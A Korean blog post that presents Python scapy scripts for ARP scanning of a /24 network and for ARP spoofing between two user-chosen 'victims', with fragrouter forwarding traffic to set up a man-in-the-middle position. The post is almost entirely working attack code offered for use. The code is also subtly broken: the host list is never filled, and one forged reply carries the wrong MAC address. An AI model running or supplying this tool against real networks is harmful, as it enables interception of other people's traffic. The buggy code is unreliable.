ARP Spoofing

<scan.py>

from scapy.all import *
import threading
import os

host_list = {}
num = 0
threadLock = threading.Lock()
threads = []

def printHosts(host_list):
    print('-------------------------- HOST LIST --------------------------')
    print('NUM         IP                               MAC')
    print('---------------------------------------------------------------')
    for num in host_list:
        ip, mac = host_list[num]
        print("%d           %s                      %s" % (num, ip, mac))
    print('---------------------------------------------------------------')

def sendARP(ip):
    global host_list, num
    ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip), timeout=5, retry=1)
    for s, r in ans:
        threadLock.acquire()
        num = num + 1
        host_list.update()
        threadLock.release()

def scanHosts():
    for i in range(1, 256):
        ip = "192.168.0.%d" % i
        th = threading.Thread(target=sendARP, args=(ip,))
        th.start()
        threads.append(th)

    for t in threads:
        t.join()

    os.system('clear')
    printHosts(host_list)
    return host_list

 

<arp_spoofing.py>

from scan import *
from scapy.all import *
import os

def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    arp1=ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac)
    arp2=ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic2_mac)
    send(arp1)
    send(arp2)

def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    arp1=ARP(op=2, psrc=vic1_ip, hwsrc=vic1_mac, pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff')
    arp2=ARP(op=2, psrc=vic2_ip, hwsrc=vic2_mac, pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff')
    send(arp1, count=3)
    send(arp2, count=3)

def main():
    host_list=scanHosts()
    victim1=input("Victim 1 : ")
    victim2=input("Victim 2 : ")

    print("ARP Spoofing START")

    os.system("fragrouter -B1")
    try:
        while True:
            arpSpoof(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
    except KeyboardInterrupt:
        restoreARP(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
        print("ARP Spoofing END")

if __name__=='__main__':
    main()

 

 

저작자표시

'Programming > Python' 카테고리의 다른 글

Dictionary Attack  (0)	2020.03.04
ARP를 이용한 host scan  (0)	2020.02.24
ARP Spoofing  (0)	2020.02.24
cookie를 이용한 로그인  (0)	2018.07.18
살아있는 호스트 IP 스캔하기  (0)	2018.02.13
1의 보수와 2의 보수  (2)	2017.01.20